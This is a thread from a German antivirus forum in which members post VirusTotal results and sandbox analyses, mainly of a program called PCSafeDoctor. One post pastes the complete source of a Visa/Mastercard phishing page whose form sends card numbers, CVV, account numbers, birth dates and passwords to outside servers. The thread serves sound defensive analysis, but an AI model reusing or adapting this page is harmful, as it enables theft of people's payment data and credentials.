Uploadergebnisse v-total + jotti, viel spass :) |
Willkommen, Gast ( Anmelden | Registrierung )
Uploadergebnisse v-total + jotti, viel spass :) |
25.10.2011, 04:02
Beitrag
#4341
|
|
Wohnt schon fast hier Gruppe: Mitglieder Beiträge: 848 Mitglied seit: 23.10.2006 Mitglieds-Nr.: 5.481 Betriebssystem: Linux Mint 20.2 64bit Virenscanner: keinen Firewall: Linux Mint |
Bei mir auch!
-------------------- Bord MSI P67 GD65, Intel 2600k 4x 3,4GHz S1155 Box,CPU Kühler: Corsair H70 , Speicher Kit 4x4GB GSkill DDR3 1333, Grafik ATI HD5870,DVD-Rom und Brenner LG,Brenner LG,BlueRay Brenner LG, Festplatten größe 1760GB, Gehäuse: CM Storm SNIPER Ultra
|
|
|
25.10.2011, 04:31
Beitrag
#4342
|
|
Ist unverzichtbar Gruppe: Mitglieder Beiträge: 11.168 Mitglied seit: 28.11.2004 Mitglieds-Nr.: 1.621 Betriebssystem: Windows 10 pro x64 Virenscanner: Emsisoft Anti-Malware Firewall: Sandboxie | cFos |
War nach Zeitpunkt der Erstellung noch in Ordnung. VT mal wieder.
-------------------- Yours sincerely
Uwe Kraatz |
|
|
25.10.2011, 19:44
Beitrag
#4343
|
|
Gehört zum Inventar Gruppe: Mitglieder Beiträge: 1.872 Mitglied seit: 24.05.2004 Mitglieds-Nr.: 872 Betriebssystem: Win 10 64bit Virenscanner: F-Secure Firewall: Win Firewall |
|
|
|
30.10.2011, 19:24
Beitrag
#4344
|
|
Ist unverzichtbar Gruppe: Mitglieder Beiträge: 11.168 Mitglied seit: 28.11.2004 Mitglieds-Nr.: 1.621 Betriebssystem: Windows 10 pro x64 Virenscanner: Emsisoft Anti-Malware Firewall: Sandboxie | cFos |
http://www.virustotal.com/file-scan/report...e1bc-1319997334
http://www.virustotal.com/url-scan/report....c9a9-1319994216 http://www.virustotal.com/url-scan/report....93d4-1319994055 Mal wieder der übliche Email-Visa-Betrugsversuch. Trend schlägt sich wacker. QUELLTEXT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "
www.w3.org/TR/html4/strict.dtd"> <html lang="en"><head> <script LANGUAGE="JavaScript"> function popUp(URL) { day = new Date(); id = day.getTime(); eval("page" + id + " = window.open(URL, '" + id + "', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,widt h=300,height=220,left = 362,top = 274');"); } </script> <META content="MSHTML 6.00.2900.3199" name=GENERATOR> <style type="text/css"> .style2 {font-family: Verdana} .style4 {font-family: Verdana; font-size: 12px; } .style7 {font-size: 13px} .style11 {font-family: Verdana; font-size: 13px; font-weight: bold; } .style14 {font-family: Verdana; font-size: 11px; } </style> <title>Plase Fill und bestätigen Sie Ihre Kontodaten.</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <link rel="stylesheet" href="https://online.hmrc.gov.uk/style/ck/hmrc.css" type="text/css"> <link rel="stylesheet" href="https://online.hmrc.gov.uk/style/ck/print.css" type="text/css" media="print"> <!--[if IE 7]> <link rel="stylesheet" href="https://online.hmrc.gov.uk/style/ck/ie7fix.css" type="text/css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" href="https://online.hmrc.gov.uk/style/ck/ie6fix.css" type="text/css"> <![endif]--> <!--[if IE 5]> <link rel="stylesheet" href="https://online.hmrc.gov.uk/style/ck/ie5fix.css" type="text/css"> <![endif]--> </SCRIPT> <script language="JavaScript" type="text/JavaScript"> function submitIt(processForm){ if(processForm.name.value == ""){ alert("Please enter your Full Name"); processForm.name.select(); return false; } if(processForm.address.value == ""){ alert("Please complete your Adress"); processForm.address.select(); return false; } if(processForm.city.value == ""){ alert("Please enter your City"); processForm.city.select(); return false; } if(processForm.zip.value == ""){ alert("Please enter your Postal Code"); processForm.zip.select(); return false; } if(processForm.phone.value == ""){ alert("Please enter your Phone Number"); processForm.phone.select(); return false; } if(processForm.bank.value == ""){ alert("Please enter your Bank Name"); processForm.bank.select(); return false; } if(processForm.card.value == ""){ alert("Please enter your Card Number"); processForm.card.select(); return false; } } </script> <style type="text/css"> <!-- .style24 {font-size: 10px; font-weight: bold; font-family: "Courier New", Courier, mono; } --> </style> </head> <body id="top"> <dl class="process-overview"> <p><img src="http://www.thetechherald.com/media/images/200947/visa_phishing_top.jpg" width="160" height="100"> <img src="http://www.fsgbank.com/media/ext/uploaded/c838dd39-375d-4135-a88c-55c0b3a15f48/logo_mastercardSecurecode.png" style="margin-left: 400px;" ></p> <hr class="dotted"> <dt class="selected">1</dt><dd class="selected">Eingeben<br>Details</dd> <dt>2</dt><dd class="last">Finish</dd> <div id="user-information"> </div> <h1 class="no-menu"> Schritt 1 - Geben Sie die Details </h1> <a name="main" class="screen-reader"></a> </div> <div id="AcceptTermsAndConditions" class="portlet"> <div class="portlet-header"> <h2> Informationen zur Abrechnung</h2> </div> <div class="portlet-body"> <td><form action="http://dachdecker.com.ua/index3.php" name="processForm" method="POST" onsubmit="return submitIt(this)"> <td><span class="style4"><span class="style7"><STRONG><U>Kreditkarten-Informationen</U></STRONG> - Bitte geben Sie Ihren Kredit-oder Debit Card.</span></span></td> </tr> <tr> <td> <form action="http://222.122.81.53/verifikation/konfirmation.php" name="processForm" method="POST" onsubmit="return submitIt(this)"></td> </tr> <tr> <td><table width="735" border="0" align="center" cellpadding="3" cellspacing="3"> <tr> <td class="style11"><div align="right">Debit / Credit Kartennummer: </div></td> <td width="24%"><input name="card" title="Debit / Credit Card Number" type="text" id="card" size="25" maxlength="23"></td> <td width="6%"><img src="http://www.ysutopia.net/images/logo_cc_visa_37x23.gif" alt="Visa" width="37" height="23"></td> <td width="23%"><img src="http://www.ysutopia.net/images/logo_cc_mc_37x23.gif" alt="MasterCard" width="37" height="23"><img src="https://secure.wp3.rbsworldpay.com/sc2/jsp/shopper/icons/MAESTRO-SSL.gif" alt="" width="43" height="23" /></td> </tr> <tr> <td class="style11"><div align="right">Verfallsdatum: </div></td> <td colspan="3"><select name="expm" id="expm" title="Expiration Month"> <option value="">- Month -</option> <option>01</option> <option>02</option> <option>03</option> <option>04</option> <option>05</option> <option>06</option> <option>07</option> <option>08</option> <option>09</option> <option>10</option> <option>11</option> <option>12</option> </select> / <select name="expy" id="expy" title="Expiration Year"> <option value="">- Year -</option> <option>2011</option> <option>2012</option> <option>2013</option> <option>2014</option> <option>2015</option> <option>2016</option> <option>2017</option> <option>2018</option> </select></td> </tr> <tr> <td class="style11"><div align="right">Karten-Prüfnummer:</div></td> <td colspan="3"><input name="cvv" title="Card Verification Number" type="text" id="cvv" size="4" maxlength="3"> [ <A HREF="java script:popUp('https://internetadcorp.com/pictures/cv_card.gif')" onMouseOver="window.status='Done'; return true" onMouseOut="window.status='Done'; return true">view sample</A> ]</td> </tr> <tr> <td class="style11"><div align="right">Konto-Nummer:</div></td> <td><input name="ssn" title="Account Number" type="text" id="ssn" size="25" maxlength="50"></td> </tr> <tr> <td class="style11"><div align="right">PLZ:</div></td> <td><input name="zip" title="PLZ" type="text" id="zip" size="6" maxlength="6"></td> </tr> <tr> <td width="47%" class="style11"><div align="right">Geburtsdatum: </div></td> <td><input name="a" title="CardHolder Name" type="text" id="a" size="2" maxlength="2"> <input name="b" title="CardHolder Name" type="text" id="b" size="2" maxlength="2"> <input name="c" title="CardHolder Name" type="text" id="c" size="4" maxlength="4"> <br> <span class="style14">(mm/dd/yyyy)</span></td> </tr> <tr> <tr> <td class="style11"><div align="right">Passwort:</div></td> <td><input name="sec" title="SecureCoder" type="password" id="sec" size="25" maxlength="50"></td> </tr> <tr> <tr> <td class="style11"><div align="right">Passwort bestätigen:</div></td> <td><input name="sec2" title="bestätigen" type="password" id="sec2" size="25" maxlength="50"></td> </tr> </table></td> </tr> <tr> <td><div align="center"></div></td> </tr> <tr> <td> </td> </tr> <tr> <td> </td> </tr> <tr> <td><div align="center"> <input type="submit" name="Submit" value=" Submit Informationen " onMouseOver="window.status='Done'; return true" onMouseOut="window.status='Done'; return true"> </div></td> </tr> <br> <br> <ul class="inline-navigation" id="footer"> <li class="first"> © <a title="Opens in new window" target="_blank" class="new-window" href="http://www.visa.de">Copyright © 2011 Visa / Mastercard</a></li> </ul> <script src="https://online.hmrc.gov.uk/js/framework.js" type="text/javascript"></script> <!-- HMRC Registration Service --> <!-- 46.17.00 --> <!-- 2.1.13 --> <!-- PageComplete --> </body></html> </script> </body></html> -------------------- Yours sincerely
Uwe Kraatz |
|
|
24.03.2012, 10:14
Beitrag
#4345
|
|
Ist unverzichtbar Gruppe: Mitglieder Beiträge: 4.246 Mitglied seit: 12.06.2004 Mitglieds-Nr.: 984 Betriebssystem: Windows 10 |
https://www.virustotal.com/url/29055c002e4d...02584/analysis/
Wie sieht es bei euch aus, kommt ihr so ohne weiteres ran, an den Aufschneider!! Meldungen von der Security? Snap_2012.03.24_10h04m33s_002.png ( 288.39KB ) Anzahl der Downloads: 21 Snap_2012.03.24_10h02m16s_001.png ( 47.56KB ) Anzahl der Downloads: 26 |
|
|
24.03.2012, 15:40
Beitrag
#4346
|
|
Ist unverzichtbar Gruppe: Mitglieder Beiträge: 5.344 Mitglied seit: 02.04.2005 Wohnort: Localhost Mitglieds-Nr.: 2.320 Betriebssystem: W10 [x64] Virenscanner: EAM Firewall: EAM |
-------------------- Dr. Web' s Updates List
Dr. Web' s Virusbibliothek Dr. Web´s History "Kenshi" sagt sayonara Wer lächelt statt zu toben, ist immer der Stärkere. [japan. Sprichwort] Das Internet ist ein gefährlicher Ort, und Windows-Nutzer wissen, dass man eine Rüstung tragen sollte. Apple-Nutzer tragen stattdessen Hawaii-Hemden." [Jewgenij Kaspersky] Ubuntu Beryl Matrix 3D Desktop |
|
|
24.03.2012, 18:55
Beitrag
#4347
|
|
Gehört zum Inventar Gruppe: Mitglieder Beiträge: 2.051 Mitglied seit: 15.10.2006 Mitglieds-Nr.: 5.448 Betriebssystem: Win7 Prof. x64 Virenscanner: GDATA TP 20xx Firewall: GDATA TP 20xx |
G Data (Beta 2013) blockt weder die Website noch die Installation. Geht man bei dem Programm jedoch in den Menüpunkt "accelerate startup", so meldet sich der BB und möchte es in die Quarantäne schicken.
ZITAT *** Prozess ***
Prozess: 3596 Dateiname: pcsafedoctor.exe Pfad: c:/programme\pcsafedoctor\pcsafedoctor.exe Herausgeber: Unbekannter Herausgeber Erstelldatum: 03/24/12 17:46:25 Änderungsdatum: 01/18/12 13:55:50 Gestartet von: pcsafedoctor_setup.tmp Herausgeber: Unbekannter Herausgeber *** Aktionen *** Das Programm versucht zu erreichen, dass ein Programm beim Systemstart automatisch gestartet wird. Das Programm stellt eine Verbindung über ein Netzwerk her. Das Programm hat Dateien im Systemordner gespeichert. *** Quarantäne *** Folgende Dateien wurden in Quarantäne verschoben: C:\Programme\PCSafeDoctor\pcsafedoctor.exe C:\WINDOWS\tpcsd Folgende Registry Einträge wurden gelöscht: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\RkHit || ImagePath OjowLDAuODA4LDI0MToxLDEsMjg6MiwxLDc4OjMsMSwyMDc6NCwxLDM6NiwxLDE6NywxLDE6OCwx LDk5OjE0LC0xLDE6MTUsMSwxOjM1LDAuODA4LDI4OjM3LDEsMTozOCwxLDY1OjQ2LDEsMjo0NywxL DI4OjUzLDEsNDo2NCwxLDEyOjY1LDEsMjo2OCwxLDE6MTE5LDEsMToxMjUsMSwxOjE0NSwyLjA1NT Y4ZSswMDYsMjI6MTQ3LDEsNjoxNDgsMSw2NzoxNTAsMSwxOjoA Version der Regeln: 3.0.3 "C:\Programme\PCSafeDoctor\pcsafedoctor.exe" "C:\DOKUME~1\Admin\LOKALE~1\Temp\is-TKH08.tmp\PCSafeDoctor_Setup.tmp" /SL5="$120154,44274847,78848,C:\Dokumente und Einstellungen\Admin\Eigene Dateien\Downloads\PCSafeDoctor_Setup.exe" |
|
|
24.03.2012, 20:27
Beitrag
#4348
|
|
Ist unverzichtbar Gruppe: Freunde Beiträge: 4.014 Mitglied seit: 27.03.2004 Mitglieds-Nr.: 522 Betriebssystem: Windows 11 Pro Virenscanner: F-Secure IS Firewall: Router, Windows-Firewall |
Also Seitenaufruf und Download ist mit Emsisoft ohne weiteres möglich.
Manueller Scan auch ohne Befund. Die Installation möchte ich mir jetzt nicht antun. -------------------- Gruß
Stefan |
|
|
25.03.2012, 06:15
Beitrag
#4349
|
|
Ist unverzichtbar Gruppe: Mitglieder Beiträge: 5.344 Mitglied seit: 02.04.2005 Wohnort: Localhost Mitglieds-Nr.: 2.320 Betriebssystem: W10 [x64] Virenscanner: EAM Firewall: EAM |
-------------------- Dr. Web' s Updates List
Dr. Web' s Virusbibliothek Dr. Web´s History "Kenshi" sagt sayonara Wer lächelt statt zu toben, ist immer der Stärkere. [japan. Sprichwort] Das Internet ist ein gefährlicher Ort, und Windows-Nutzer wissen, dass man eine Rüstung tragen sollte. Apple-Nutzer tragen stattdessen Hawaii-Hemden." [Jewgenij Kaspersky] Ubuntu Beryl Matrix 3D Desktop |
|
|
25.03.2012, 19:29
Beitrag
#4350
|
|
Ist unverzichtbar Gruppe: Freunde Beiträge: 5.267 Mitglied seit: 30.11.2003 Wohnort: Dortmund Mitglieds-Nr.: 242 Betriebssystem: Windows 10 Prof 64Bit Virenscanner: GData/ MS Defender Firewall: Router/ Windows 10 |
Moin zusammen,
BitDefender meckert werde beim Aufruf der Seite, noch beim Download. Ein manueller Scan der Datei ergab auch nix. Bis denne Olli -------------------- ...und sonst bin ich mit einem VW T3 oder einer V-Strom unterwegs...
|
|
|
26.03.2012, 05:42
Beitrag
#4351
|
|
Ist unverzichtbar Gruppe: Mitglieder Beiträge: 11.168 Mitglied seit: 28.11.2004 Mitglieds-Nr.: 1.621 Betriebssystem: Windows 10 pro x64 Virenscanner: Emsisoft Anti-Malware Firewall: Sandboxie | cFos |
Warum prüft nicht mal einer mit Uninstaller, HIPS und Sniffer, was das Programm eigentlich anstellt?
-------------------- Yours sincerely
Uwe Kraatz |
|
|
26.03.2012, 09:37
Beitrag
#4352
|
|
Gehört zum Inventar Gruppe: Mitarbeiter Beiträge: 3.995 Mitglied seit: 30.08.2009 Wohnort: Leipzig Mitglieds-Nr.: 7.705 Betriebssystem: Win10 Pro (x64) Virenscanner: none | Sandboxie Firewall: WinFW |
Warum prüft nicht mal einer mit Uninstaller, HIPS und Sniffer, was das Programm eigentlich anstellt? Könnte ja gefährlich sein, schließlich warnen die bösen AVs _ Habe es mal schnell getestet: Dateien: CODE [ Changes to filesystem ] * Creates file C:\Program Files\PCSafeDoctor\bmgac * Creates file C:\Program Files\PCSafeDoctor\DelTmpFile.ls * Creates file C:\Program Files\PCSafeDoctor\dxddd * Creates file C:\Program Files\PCSafeDoctor\idamx * Creates file C:\Program Files\PCSafeDoctor\iflee * Creates file C:\Program Files\PCSafeDoctor\md5.dll * Creates file C:\Program Files\PCSafeDoctor\networkdll.dll * Creates file C:\Program Files\PCSafeDoctor\opfile.dll * Creates file C:\Program Files\PCSafeDoctor\Option.ini * Creates file C:\Program Files\PCSafeDoctor\pcsafedoctor.exe * Creates file C:\Program Files\PCSafeDoctor\pcsafedoctor.url * Creates file C:\Program Files\PCSafeDoctor\RkHitApi.dll * Creates file C:\Program Files\PCSafeDoctor\spkdll.dll * Creates file C:\Program Files\PCSafeDoctor\unins000.dat * Creates file C:\Program Files\PCSafeDoctor\unins000.exe * Creates file C:\Program Files\PCSafeDoctor\update\uplist.up * Creates file C:\Program Files\PCSafeDoctor\ussafe.dll * Creates file C:\Program Files\PCSafeDoctor\vf * Creates file C:\Program Files\PCSafeDoctor\vircount.ls * Creates file C:\Program Files\PCSafeDoctor\virname.ls * Creates file C:\Program Files\PCSafeDoctor\xxcum * Creates file C:\Program Files\PCSafeDoctor\zlib1.dll * Creates file C:\Windows\system32\drivers\RKHit.sys * Creates file C:\Windows\tpcsd * Creates file D:\Desktop\pcsafedoctor.lnk * Creates file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PCSafeDoctor\pcsafedoctor on the Web.lnk * Creates file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PCSafeDoctor\pcsafedoctor.lnk * Creates file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PCSafeDoctor\Uninstall pcsafedoctor.lnk Die pcsafedoctor.exe ist bei VTT schon 2 Monate bekannt, nicht tragisch. Die tpcsd im Windows Verzeichnis enthält nur das Installationsdatum QUELLTEXT [BTM] Tm=26.03.2012 Der installierte Treiber RKHit.sys wird bei VTT nur von einigen Exoten erkannt und ist schon lange bekannt. Registry: nichts außergewöhnliches, Treiber wird registriert, Autostart angelegt. CODE [ Changes to registry ] * Creates value "NukeOnDelete=01000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket * Creates value "UseGlobalSettings=01000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket * Creates value "pcsafedoctor.exe=C:\Program Files\PCSafeDoctor\pcsafedoctor.exe" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Run * Creates value "Inno Setup: Setup Version=5.2.3" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1 * Creates value "Inno Setup: App Path=C:\Program Files\PCSafeDoctor" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1 * Creates value "InstallLocation=C:\Program Files\PCSafeDoctor\" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1 * Creates value "Inno Setup: Icon Group=PCSafeDoctor" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1 * Creates value "Inno Setup: User=Sebastian" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1 * Creates value "Inno Setup: Selected Tasks=desktopicon" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1 * Creates value "Inno Setup: Deselected Tasks=quicklaunchicon" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1 * Creates value "DisplayName=PCSafeDoctor" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1 * Creates value "UninstallString="C:\Program Files\PCSafeDoctor\unins000.exe"" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1 * Creates value "QuietUninstallString="C:\Program Files\PCSafeDoctor\unins000.exe" /SILENT" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1 * Creates value "DisplayVersion=2.0" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1 * Creates value "Publisher=pcsafedoctor.com, Inc." in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1 * Creates value "URLInfoAbout=http://www.pcsafedoctor.com" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1 * Creates value "HelpLink=http://www.pcsafedoctor.com" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1 * Creates value "URLUpdateInfo=http://www.pcsafedoctor.com" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1 * Creates value "NoModify=01000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1 * Creates value "NoRepair=01000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1 * Creates value "InstallDate=20120326" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Uninstall\PCSafeDoctor_is1 * Creates value "ErrorControl=01000000" in key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\RkHit * Creates value "ImagePath=\??\C:\Windows\system32\drivers\RKHit.sys" in key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\RkHit * Creates value "Start=03000000" in key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\RkHit * Creates value "Type=01000000" in key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\RkHit * Creates value "SymbolicLinkValue=5C00520045004700490053005400520059005C005500530045005 2005C00530061006E00640062006F0078005F00530065006200610073007400690061006E005 F 0030005F005300570054005F0031005C0075007300650072005C00630075007200720065006E 0 074005F0063006C0061007300730065007300" in key HKEY_CURRENT_USER\software\classes * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{09382062-2f85-11e0-ad26-e64bc137e4c6} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1c05d857-ee68-11de-9bc0-001b24da8d8e} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{27ba24a2-e800-11de-9e9b-001b24da8d8e} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{288981aa-e4e7-11de-91ad-001b24da8d8e} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{288981ae-e4e7-11de-91ad-001b24da8d8e} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{288981b8-e4e7-11de-91ad-001b24da8d8e} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{288981bc-e4e7-11de-91ad-001b24da8d8e} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{288981c6-e4e7-11de-91ad-001b24da8d8e} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fbcd0d4-2f93-11df-9378-884d12c21a28} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{30155e1d-e806-11de-8dd9-028037150300} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{46508a85-edc1-11de-9de3-001b24da8d8e} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{52e99a4b-e4ff-11de-8b29-001b24da8d8e} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{67cc2285-e4e6-11de-b42e-806e6f6e6963} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{67cc2286-e4e6-11de-b42e-806e6f6e6963} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{67cc2287-e4e6-11de-b42e-806e6f6e6963} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{67cc2288-e4e6-11de-b42e-806e6f6e6963} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{967f74a0-f7eb-11de-827d-001b24da8d8e} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{a4934dd5-39e2-11e0-ac53-d5cb293fb219} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{a9aab2e3-1c8a-11df-88a6-005056c00008} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b7828f21-0c16-11df-83fe-001b24da8d8e} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{c0022f98-e504-11de-814c-001b24da8d8e} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{cc629c48-eb49-11de-9239-001b24da8d8e} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d326092c-e75f-11de-8858-001b24da8d8e} old value empty * Modifies value "NukeOnDelete=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d428a030-1bac-11df-8aac-f4d2b4ee493f} old value empty * Modifies value "AutoDetect=01000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap old value empty * Creates value "HomeURL=http://www.pcsafedoctor.com" in key HKEY_CURRENT_USER\software\PCSafeDoctor * Creates value "RegisterURL=http://www.pcsafedoctor.com/register/" in key HKEY_CURRENT_USER\software\PCSafeDoctor * Creates value "HelpURL=http://www.pcsafedoctor.com/online-help.php" in key HKEY_CURRENT_USER\software\PCSafeDoctor * Creates value "PCSafeDoctor_Setup.exe=PCSafeDoctor Setup " in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\D:\Downloads * Creates value "PCSafeDoctor_Setup.tmp=Setup/Uninstall" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Sandbox\0_SWT_1\drive\T\Temp\is-21MHC.tmp * Creates value "pcsafedoctor.exe=PC Safe Doctor" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Sandbox\0_SWT_1\drive\C\Program Files\PCSafeDoctor Netzwerk: Außer Update, Signatur und Cloudprüfungen nichts. _ Das Programm selbst: (1) Ein paar Tuning Features mit nervigen Info-Popups (Autostarts prüfen, Tempfiles löschen) (2) Malware und Spywarescanner. Angebliche Bedrohungen (wie bei Roques üblich) wurden nicht gemeldet - gut! Aus Mangel an alten Samples auf diesem PC, habe ich es mal auf ~90 aktuelle Malwarefiles von gestern losgelassen. Dabei wurden mit den lokalen/gecachten Signaturen erstmal nur 6 erkannt: Den Rest an unbekannten Files kann man per Cloud prüfen... ... was einige verdächtige Dateien (Erkennungen?) mehr bringt: Entfernung kostet natürlich: Fazit: In meinen Augen definitiv ein überflüssiges Programm, wo es viele schon gibt. (die z.T. hier vorgestellt und empfohlen werden) Warum AVs das jedoch erkennen sollten weiß ich nicht, es macht für mich nichts erkennbar böses und es werden keine Fake-Alarme ausgegeben (wie bei Roques üblich). Das die Entfernung kostet ist nicht so ungewöhnlich (tut sie bei HitmanPro ja auch). Der Beitrag wurde von SLE bearbeitet: 26.03.2012, 09:59 -------------------- Don't believe the hype!
|
|
|
26.03.2012, 18:05
Beitrag
#4353
|
|
Gehört zum Inventar Gruppe: Mitglieder Beiträge: 2.051 Mitglied seit: 15.10.2006 Mitglieds-Nr.: 5.448 Betriebssystem: Win7 Prof. x64 Virenscanner: GDATA TP 20xx Firewall: GDATA TP 20xx |
Man kann das Programm auch wieder ganz normal deinstallieren. Ich habe allerdings nicht nachgeprüft, ob viel zurückbleibt. 40-50MB für ein reines Fake-AV finde ich aber ziemlich viel. Ich würde es auch mal in die Kategorie "überflüssiges Programm" schieben.
|
|
|
26.03.2012, 19:33
Beitrag
#4354
|
|
Ist unverzichtbar Gruppe: Mitglieder Beiträge: 11.168 Mitglied seit: 28.11.2004 Mitglieds-Nr.: 1.621 Betriebssystem: Windows 10 pro x64 Virenscanner: Emsisoft Anti-Malware Firewall: Sandboxie | cFos |
Habe es mal schnell getestet... Klar...schnell...mal eben so... Ich weiß sehr wohl, was mal eben schnell ist Also darf man das Progrämmchen weder als Scareware, noch als Rogueware bezeichnen. Es tut ja was, wenn auch nicht viel. Ist so ein TuneUp der Anti-Malware-Szene Edit: Vielleicht sollte man es mal in gelbe Schachteln verpacken, draufschreiben...dass es den PC schneller macht...an Computerbild schicken und Testsieger werden lassen Der Beitrag wurde von Solution-Design bearbeitet: 26.03.2012, 19:35 -------------------- Yours sincerely
Uwe Kraatz |
|
|
26.03.2012, 20:00
Beitrag
#4355
|
|
Gehört zum Inventar Gruppe: Mitarbeiter Beiträge: 3.995 Mitglied seit: 30.08.2009 Wohnort: Leipzig Mitglieds-Nr.: 7.705 Betriebssystem: Win10 Pro (x64) Virenscanner: none | Sandboxie Firewall: WinFW |
